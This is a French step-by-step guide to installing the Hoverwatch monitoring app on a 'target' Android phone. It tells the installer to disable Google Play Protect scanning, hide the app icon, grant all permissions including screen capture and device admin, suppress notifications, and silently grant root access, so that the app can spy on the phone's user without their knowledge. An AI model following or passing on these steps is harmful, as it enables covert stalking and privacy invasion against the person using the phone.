Comment installer Hoverwatch pour Android

VVidéo d’instruction:

Texte d’instruction

1. Préparez votre téléphone cible:

Pour empêcher Android de poser des questions sur l'activité du programme de surveillance:

Ouvrez l'application "Google Play Store" -> cliquez surMenu -> sélectionnez "Protection de Lecture / Play Protect" -> appuyez sur l’icône Paramètres / Settings .
Désactivez "Analyser le périphérique pour les menaces / Scan device for security threats" et "Améliorer les détections d'applications nuisibles / Improve harmful app detections".

2. Téléchargez l'Application

Ouvrez votre navigateur. Activez le "Mode Incognito / Secret mode" si vous préférez. Tapez Entrez votre adresse électronique ainsi que votre mot de passe (créez un compte Hoverwatch) et cliquez sur "INSCRIVEZ-VOUS GRATUITEMENT / SIGN UP FREE".

Sélectionnez Android et cliquez sur le lien de téléchargement.

Appuyez sur "Télécharger / Download".

Appuyez sur "Ouvrir le fichier / Open file".

Si vous ne trouvez pas la page "Ajouter un Périphérique / Add Device", appuyez sur le bouton "Menu" , appuyez sur le bouton "Ajouter un Périphérique / Add Device".

3. Installez l'application

Appuyez sur "Paramètres / Settings" et autorisez l'installation de l'application.

Appuyez sur "Retour / Back". Appuyez sur Installer / Install.

Si le bouton "Ouvrir" n'est pas actif, suivez les instructions.

Sélectionnez l'option d'installation et cliquez sur OK.

Selon votre choix, vous pouvez choisir de masquer l'icône Hoverwatch.

Acceptez les termes légaux / Legal terms.

Entrez votre identifiant et votre mot de passe pour votre compte Hoverwatch. Appuyez sur Activer / Activate.

Activer toutes les autorisations de l'application:

Cliquez sur "OUI / YES" puis sur "Autoriser / Allow" afin d’activer toutes les autorisations.

Désactiver l'optimisation de la batterie:

Appuyez sur "Oui / Yes". Cliquez sur "Permettre / Allow".

Activez la permission "Apparaitre en haut / Appear on top":

Appuyez sur "Oui / Yes", et activez "Accepter la permission / Allow permission". Appuyez sur le bouton "Retour".

Autoriser l'application à capturer l'écran:

Appuyez sur "OUI / YES".

Activer l'option "Ne plus afficher / Don`t show again". Appuyez sur le bouton "Démarrer maintenant / Start now".

Activez "Suivi de l'utilisation / Usage tracking":

Appuyez sur " Oui / Yes", recherchez et tapez sur "Service de synchronisation / Sync Service", activez "Autoriser le suivi de l'utilisation / Allow usage tracking".

002.jpg 003.jpg

Appuyez deux fois sur le bouton "Retour / back" et revenez à l'application Hoverwatch.

Désactiver les notifications d’applications / app notifications:

Appuyez sur "Oui / Yes". Décochez "Montrer les notification / Show notifications".

5.1.jpg 5.2.jpg

Appuyez deux fois sur "retour / back" et retournez au app Hoverwatch.

Activer Gestion des appareils / Device admin:

Appuyez sur "Oui / Yes" après appuyez sur "Activer / Activate".

4. Vérifiez les paramètres supplémentaires

Si votre téléphone n'a pas encore été rooté, vous êtes prêt.

Si votre téléphone est rooté, le programme vous posera encore quelques questions durant l'installation.

Lorsqu'on vous demande si vous souhaitez redémarrer, répondez "Oui".

Dans "Demande d'autorisation à donner les droits root", veillez à bien cocher la case "Ne plus demander", puis cliquez sur "Autoriser".

Veuillez vérifiez si votre appareil est correctement rooté grâce à un vérificateur gratuit de Google Play Store.

Le programme commencera à fonctionner après le redémarrage de votre périphérique.

5-6 minutes plus tard, les informations de l'appareil apparaîtront dans votre compte Hoverwatch.

show up